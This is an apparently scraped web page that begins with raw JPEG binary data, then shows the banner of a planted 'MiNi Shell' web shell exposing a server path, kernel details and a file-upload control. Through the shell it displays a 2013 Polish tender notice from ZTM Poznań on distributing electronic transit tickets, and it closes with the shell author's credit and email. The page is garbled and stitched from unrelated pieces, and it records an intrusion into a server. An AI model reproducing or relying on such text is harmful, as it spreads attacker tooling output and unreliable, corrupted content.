JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130416/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130416/57737-N-2013.html

<p class="kh_header"><b>Poznań: Dystrybucja elektronicznych biletów długookresowych ZTM w Poznaniu .</b><br>
<b>Numer ogłoszenia: 57737 - 2013; data zamieszczenia: 16.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Transportu Miejskiego w Poznaniu , ul. Matejki 59, 60-770 Poznań, woj. wielkopolskie, tel. 61 834 6146, faks 61 834 61 47.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ztm.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dystrybucja elektronicznych biletów długookresowych ZTM w Poznaniu ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa dystrybucji elektronicznych biletów długookresowych ZTM w Poznaniu.
1.Definicje użyte w opisie przedmiotu zamówienia
1.1 ZTM  -Zarząd Transportu Miejskiego w Poznaniu, z siedzibą ul. Matejki 59, 60-770 Poznań.
1.2 Elektroniczny bilet długookresowy - elektroniczny zapis na karcie zbliżeniowej uprawniający do korzystania z przejazdów środkami transportu zbiorowego ZTM w ustalonej formie taryfowej.
1.3 Karta zbliżeniowa - karta plastikowa z mikroprocesorem o wymiarach zgodnych z  kartami płatniczymi ID-1 o określonym wzorze graficznym.
1.4  Stanowisko ładowania (dalej: ZSB) - stacjonarne stanowisko do dystrybucji elektronicznych biletów długookresowych na kartach zbliżeniowych, umieszczone w punkcie sprzedaży.                                                        
1.5  Punkt sprzedaży (dalej: PS) - lokalizacja posiadająca wskazanie lokalizacyjne, w której znajduje  się przynajmniej jeden ZSB i w której jest realizowana na rzecz ZTM sprzedaż elektronicznych biletów długookresowych.
1.6 Dystrybucja elektronicznych biletów długookresowych - elektroniczne zapisywanie    informacji na karcie zbliżeniowej o zawartej z pasażerem umowie uprawniającej do korzystania z środków transportu zbiorowego na terenie objętym działalnością ZTM.
1.7 DSB ZTM - Dział Sprzedaży Biletów  w Poznaniu, ul. Matejki 59,60-770 Poznań.
2.  Elektroniczne bilety długookresowe winny być dystrybuowane zgodnie z poniższymi ustaleniami:
2.1  Infrastruktura Dystrybutora, musi umożliwiać stałą , niezakłóconą dystrybucję elektronicznych biletów długookresowych na zasadach   określonych w umowie.
2.2  Dystrybutor musi dysponować siecią minimum 24 PS, których ZTM dokona wyboru 12 PS.   
Punkty muszą być wyposażone w przyłącze elektryczne umożliwiające  podłączenie terminala,drukarki i modemu telefonii komórkowej.  Ponadto muszą być odpowiednio  zabezpieczone przed skutkami włamania, t,j.  punkty sprzedaży muszą posiadać jeden z niżej wymienionych systemów zabezpieczeń dystrybucji elektronicznych biletów okresowych:
a) 24 godzinną ochronę przez wyspecjalizowane służby ochroniarskie,
b) system alarmowy włamania i napadu,
c) telewizyjny system nadzoru,
d) elektroniczny system kontroli dostępu do pomieszczeń,
e) system transmisji alarmu,
f) kraty,
g) żaluzje antywłamaniowe, 
Wykaz PS stanowi załącznik nr 3 do SIWZ.                
2.3  We wszystkich  punktach Dystrybutora zgodnie z załącznikiem nr 3  musi być prowadzona  dystrybucja elektronicznych biletów długookresowych ZTM.
2.4  Punkty sprzedaży(PS) elektronicznych biletów długookresowych Dystrybutora zostaną wyposażone w stacjonarne stanowisko(ZSB) do ładowania elektronicznych biletów długookresowych na kartach  zbliżeniowych. Stanowiska stanowią własność ZTM Poznań, jednak z chwilą podpisania przez Dystrybutora protokołu przejęcia stacjonarnego stanowiska, Dystrybutor ponosi odpowiedzialność za  ich prawidłowe użytkowanie, uszkodzenie lub utratę z przyczyn leżących po stronie Dystrybutora. W związku z tym Wykonawca musi ubezpieczyć wartość pieniężną na danym stanowisku. 
2.5 Dystrybutor zobowiązuje się do sprzedaży  elektronicznych biletów długookresowych wyłącznie  na kartach zbliżeniowych stanowiących własność ZTM lub dopuszczonych do obrotu przez ZTM.
2.6  Dystrybucja odbywać się będzie w punktach sprzedaży Dystrybutora. Określa się, iż  sprzedaż biletów powinna odbywać się   od poniedziałku do piątku w godzinach od 800 do 1800,  w 50% wszystkich punktów w soboty w godzinach od 8:00 do 14:00,w 20% wszystkich punktów w niedziele i święta od godziny 10:00 do 14:00.
3.Do obowiązków Wykonawcy należy:
3.1. przestrzegania szczegółowej Instrukcji Obsługi Punktów przekazanej przez ZTM,
3.2. wydawania dowodów sprzedaży przy ładowaniu karty, będących podstawą ewentualnej reklamacji nabywcy elektronicznego biletu długookresowego,
3.3. przekazywania wpływów uzyskanych ze sprzedaży biletów długookresowych na zasadach zawartych w Rozliczeniach Stron
4.Rozliczenia Stron
4.1  dystrybucji elektronicznych biletów długookresowych w sieci Dystrybutora przekazywane będą przelewem na wskazane przez ZTM konto bankowe pierwszą sesją elixir danego dnia;
4.2 przelewy będą dokonywane przez Dystrybutora w wysokości wynikającej z kwot zebranych z PS, w ciągu trzech dni roboczych od otrzymania drogą mailową od ZTM informacji o wielkości utargu z poprzednich dwóch, lub w przypadku weekendu trzech dni. Informacje te przesyłane będą przez ZTM w każdy poniedziałek, środę i piątek danego tygodnia;
4.3  jeżeli w dzień przypadający na zapłatę przypadnie dzień świąteczny, termin dokonania wpłaty przez Dystrybutora przypada na kolejny dzień po dniu świątecznym. Następne wpłaty będą dokonane  zgodnie z pkt.4.2;
4.4 trzy razy w miesiącu, pracownik Dystrybutora będzie przekazywał dobowe raporty sprzedaży za minioną dekadę  do siedziby ZTM ul. Matejki 59 - Dział Sprzedaży Biletów pokój 420;
4.5  po przeprowadzeniu analizy miesięcznej sprzedaży, ZTM prześle do Dystrybutora wyniki analizy, która będzie zawierać wartość wymaganych wpłat za cały okres rozliczeniowy  z uwzględnieniem zrealizowanych anulat wykonanych przez Dystrybutora na KOMkartach  oraz przez ZTM na kartach PEKA, według określonego zestawienia;
4.6  anulaty będą rozliczane wg dat wystawienia protokołu;
4.7 dystrybutor dostarczy protokoły- Protokół Anulowania- z paragonem oraz wadliwie załadowanym   biletem na KOMkarcie do siedziby ZTM w Poznaniu ul. Matejki 59 Dział Sprzedaży Biletów pokój 420, w godzinach urzędowania( poniedziałek i czwartek 900-1500,wtorek,środa,piątek 730-1430 , celem anulowania biletu.Po dokonanym anulowaniu biletu Dystrybutor odbiera karty z siedziby ZTM.Proces anulowania karty nie można być dłuższa niż 7 dni, od daty wystawienia Protokołu Anulowania;
4.8 pracownicy PS w przypadku błędnie załadowanej karty PEKA wystawiają protokół reklamacji,z którym klient zgłasza się do PSB ZTM ul. Głogowska 133 czynnego pn-pt w godz. 600-2000, lub   ul. Matejki 59 czynnego pn i czw.900 -1630 , wt., śr. i pt 730 - 1500 celem anulowania błędnie załadowanego   biletu na nośniku elektronicznym;
4.9  dystrybutor dokona przelewu, który będzie wyrównaniem wpłat za cały miesiąc, z odliczeniem anulat  dotyczących biletów elektronicznych do kwoty wynikającej z rozliczenia miesięcznego przesyłanego przez ZTM, w ciągu siedmiu dni roboczych od momentu jego otrzymania;  
4.10 w przypadku braku uregulowania przelewów utargów w terminach określonych w Rozliczeniach Stron ZTM dokona wstrzymania wypłaty prowizji za dany miesiąc; 
4.11 w przypadku stwierdzenia przez ZTM zaległości Dystrybutora z należnymi płatnościami, trwającej więcej niż 3 dni robocze względem oczekiwanej zgodnie z zapisami Rozliczeniach Stron daty wpływu, ZTM ma prawo bez uprzedniego pisemnego powiadomienia Dystrybutora zablokować wszystkie ZSB wykorzystywane przez Dystrybutora celem uniemożliwienia dalszej sprzedaży elektronicznych biletów długookresowych.

SERWIS SYSTEMU DYSTRYBUCJI ELEKTRONICZNYCH BILETÓW DŁUGOOKRESOWYCH ZTM POZNAŃ.
1.1. DEFINICJE
1)AWARIA - stan Systemu, który uniemożliwia realizację przez System podstawowych funkcji, lub negatywnie wpływa na wydajność i/lub ogranicza funkcjonalność Systemu.
2)CZAS USUNIĘCIA AWARII - maksymalny czas, jaki może upłynąć pomiędzy przyjęciem Zgłoszenia Awarii a Usunięciem Awarii. Czas Usunięcia liczony jest w godzinach Dostępności Serwisu.
3)DNI ROBOCZE - dni od poniedziałku do piątku z wyłączeniem  dni ustawowo wolnych od pracy.
4)DOSTĘPNOŚĆ SERWISU - dni i godziny, w jakich Serwis ZTM przyjmuje Zgłoszenia Awarii oraz realizuje czynności serwisowe.
5)PROCEDURA SERWISOWA - szczegółowe, dedykowane Systemowi zasady obsługi serwisowej oraz kwestie organizacyjne i komunikacji pomiędzy ZTM, a Dystrybutorem
6)PUNKT ŁADOWANIA - stacjonarne stanowisko do dystrybucji elektronicznych biletów długookresowych
7)UŻYTKOWNIK - osoba obsługująca Punkt Ładowania 
8)ROZWIĄZANIE ZASTĘPCZE - urządzenia lub rozwiązania programistyczne, które ZTM dostarczy, jeżeli w zadeklarowanym czasie nie jest możliwa naprawa uszkodzonego elementu Systemu. 
9)SYSTEM -  urządzenia i oprogramowanie objęte obsługą serwisową 
10)USUNIĘCIE AWARII - przywrócenie Systemu do stanu funkcjonalnego, w jakim znajdowało się on przed wystąpieniem Awarii, Przez Usuniecie Awarii rozumie się również zastosowanie przez ZTM Rozwiązania Zastępczego. 
11)ZGŁOSZENIE AWARII - ciąg działań mający na celu powiadomienie serwisu ZTM o zaistniałej Awarii. 

1.2. WARUNKI OGÓLNE SERWISU
1.Obsługa serwisowa Systemu obejmuje wszelkie usługi zapewniające prawidłowe działanie Systemu, tj. Usuwanie Awarii, wsparcie techniczne, oraz dostarczanie części zamiennych i zużywających się. 
2.Usługi serwisowe, których nie będzie można realizować zdalnie wykonywane będą bezpośrednio w miejscu zainstalowania Systemu.
3.W przypadku niemożności usunięcia Awarii w zadeklarowanym terminie ZTM może dostarczyć Rozwiązanie Zastępcze pozwalające na użytkowanie Systemu. Odbiór uszkodzonego i dostawa sprawnego sprzętu odbywać się będzie na koszt i ryzyko ZTM.
4.Po usunięciu jakiejkolwiek Awarii ZTM zobowiązuje się do doprowadzenia całego Systemu do stanu integralnej całości w rozumieniu poprawnego działania wszystkich zainstalowanych komponentów i aplikacji.
5.Każda Naprawa wykonywana w miejscu instalacji Systemu będzie zakończona opracowaniem Karty Pracy Serwisowej. Użytkownik zobowiązany jest do potwierdzenia Karty Pracy Serwisowej, o ile zawiera ona informacje zgodne ze stanem faktycznym. 
6.ZTM może powierzyć w całości lub częściowo wykonanie usług serwisowych podwykonawcom. 
W takim przypadku ZTM odpowiada wobec Użytkownika za działania i zaniechania podwykonawców, jak za własne działania i zaniechania. 
7.Użytkownik od momentu zgłoszenia przez czas równy Czasowi Usunięcia Awarii zapewni ciągły dostęp do urządzeń dla serwisu ZTM lub jego podwykonawcy.
1.3. PARAMETRY SERWISU 
Usługi Serwisu realizowane będą z zachowaniem następujących parametrów:
a) Okres Dostępności Serwisu - w Dni Robocze 8.00 - 18.00
b) Czas Usunięcia Awarii - 24 godziny (liczony w godzinach Dostępności Serwisu)
1.4. PROCEDURA SERWISOWA 
1.Za koordynację obsługi serwisowej, w szczególności kontakt z użytkownikami, a także zarządzanie terenowymi zasobami serwisowymi ZTM odpowiedzialny jest Dział Sprzedaży Biletów.
2.Zgłoszenie Awarii następować będzie w formie telefonicznej wyłącznie na numer określony w ust. 3, czynny w czasie Dostępności Serwisu. 
3.Dane teleadresowe serwisu :
a) telefon:  ..........................
b) faks :  .............................
c) e-mail: .............................
4.Aby Zgłoszenie Awarii zostało przyjęte Użytkownik musi podać: imię i nazwisko, lokalizacja, numer kontaktowy, opis Awarii.
1.5. WYŁĄCZENIA I  OGRANICZENIE ODPOWIEDZIALNOŚCI
1.Koszty Usuwania Awarii spowodowanych przyczynami wymienionymi poniżej, a także koszty nieuzasadnionego wezwania serwisu, ponosi Użytkownik:
a.zmiany konfiguracji sprzętowej lub programowej dokonane bez wiedzy i zgody ZTM  
(z wyjątkiem zmiany dokonanych zgodnie z instrukcją obsługi).
b.eksploatacji niezgodnej z instrukcją obsługi.
c.uszkodzenia urządzenia spowodowanego przez użytkownika.
d.zaistnienia warunków pracy urządzeń (zasilanie, temperatura, wilgotność, zapylenie itp.) niezgodnych z kartami gwarancyjnymi lub dokumentacją techniczną wynikających z winy 
lub działań użytkownika.
2.ZTM nie ponosi odpowiedzialności za niewykonanie lub zwłokę w wykonaniu usług serwisowych 
w przypadku niezachowania przez użytkowników wymagań Procedury Serwisowej.
3.ZTM nie ponosi odpowiedzialności za niewykonanie lub zwłokę w wykonaniu usług serwisowych spowodowanymi przyczynami niezależnymi od ZTM takimi jak np. mobilizacja, wojna, rozruchy, strajki, lokauty oraz przez działanie siły wyższej.
4.Koszt nieuzasadnionego wezwania serwisowego oraz koszty Usuwania Awarii spowodowane przyczynami wymienionymi w punkcie 1 będzie liczony wg roboczogodzin i aktualnych stawek ZTM, które na dzień podpisywania umowy wynoszą:
a.1 roboczogodzina - 210zł netto
b.koszt dojazdu - liczony wg następującego wzoru:
przejechane kilometry między siedzibą firmy ZTM w Poznaniu a PS x 2 x aktualnie obowiązująca stawka tzw. kilometrówki dla pojazdów o pojemności powyżej 900cm3
1.6. WIZYTY OKRESOWE
Wizyta okresowa realizowana jest co najmniej 1 raz w miesiącu, dla każdej lokalizacji i obejmuje:
a)zabranie (rozliczenie) wypełnionych druków faktur ZTM oraz rolek z drukarek,
b)zebranie ewentualnych spostrzeżeń, wniosków operatorów formie pisemnej,
c)dostarczenie dodatkowych/zmienionych stron do Instrukcji Obsługi Punktu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.22.70.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  nie wymaga zabezpieczenia oferty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie tego warunku poprzez przedłożenie oświadczenia z art. 22 ust. 1 Ustawy Pzp, o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie tego warunku poprzez przedłożenie oświadczenia z art. 22 ust. 1 Ustawy Pzp, o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie tego warunku Wykonawca wykaże, że dysponuje odpowiednim potencjałem technicznym, tj. posiada niezbędne do wykonania zamówienia narzędzia i urządzenia, w szczególności dysponuje :
- siecią co najmniej 24 punktów sprzedaży w Poznaniu wraz z odpowiednią liczbą personelu, w pełni przygotowanego do sprzedaży elektronicznych biletów okresowych,
- wszystkimi punktami sprzedaży czynnymi od poniedziałku do piątku w godzinach od    8:00 do 18:00,
- w 50% wszystkich punktów czynnymi w soboty w godzinach od 8:00 do 14:00, 
- w 20% wszystkich punktów czynnymi w niedziele i święta od godziny 10:00 do 14:00
Punkty muszą być wyposażone w przyłącze elektryczne umożliwiające podłączenie terminala, drukarki i modemu telefonii komórkowej, ponadto muszą być odpowiednio zabezpieczone przed skutkami włamania t,j. - punkty sprzedaży muszą posiadać jeden z niżej wymienionych systemów zabezpieczeń dystrybucji elektronicznych biletów okresowych:
a) 24 godzinną ochronę przez wyspecjalizowane służby ochroniarskie,
b) system alarmowy włamania i napadu,
c) telewizyjny system nadzoru,
d) elektroniczny system kontroli dostępu do pomieszczeń,
e) system transmisji alarmu,
f) kraty,
g) żaluzje antywłamaniowe,

Zamawiający z powyższego wykazu wybierze 12 punktów w których będzie świadczona usługa będąca przedmiotem niniejszego postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie tego warunku poprzez przedłożenie oświadczenia z art. 22 ust. 1 Ustawy Pzp, o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie tego warunku poprzez przedłożenie oświadczenia z art. 22 ust. 1 Ustawy Pzp, o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość dokonania zmian postanowień umowy w stosunku 
do treści oferty, na podstawie której dokonano wyboru Dystrybutora, w zakresie
a)braku możliwości dotrzymania przez Wykonawcę terminu wykonania przedmiotu umowy z przyczyn pozostających po stronie Zamawiającego,
b)zmiany rachunku bankowego, adresu, osób reprezentujących Strony, lub oznaczenia Stron umowy, wynikających ze stanu faktycznego lub prawnego,
c)zmiany w zakresie i formie przedmiotu umowy, jeżeli konieczność wprowadzenia takich zmian jest skutkiem zmiany obowiązujących przepisów prawa.
2.Zamawiający dopuszcza także zmianę umowy w przypadku ograniczenia przez Zamawiającego zakresu umowy z przyczyn, jakich nie można było przewidzieć w chwili zawierania umowy.
3.Jeżeli Zamawiający uzna, że zaistniałe okoliczności nie stanowią podstawy do zmiany 
w umowie, Wykonawca zobowiązany jest do realizacji zamówienia zgodnie z warunkami zawartymi w umowie.
4.Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Dystrybutora, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istotnych  warunków zamówienia oraz określił warunki takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ztm.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Transportu Miejskiego w Poznaniu,Sekcja  Zamówień Publicznych, ul. Matejki 59, 70-660 Poznań, pok 319..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2013 godzina 10:00, miejsce: Zarząd Transportu Miejskiego w Poznaniu,Sekcja  Zamówień Publicznych, ul. Matejki 59, 70-660 Poznań, pok 319..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com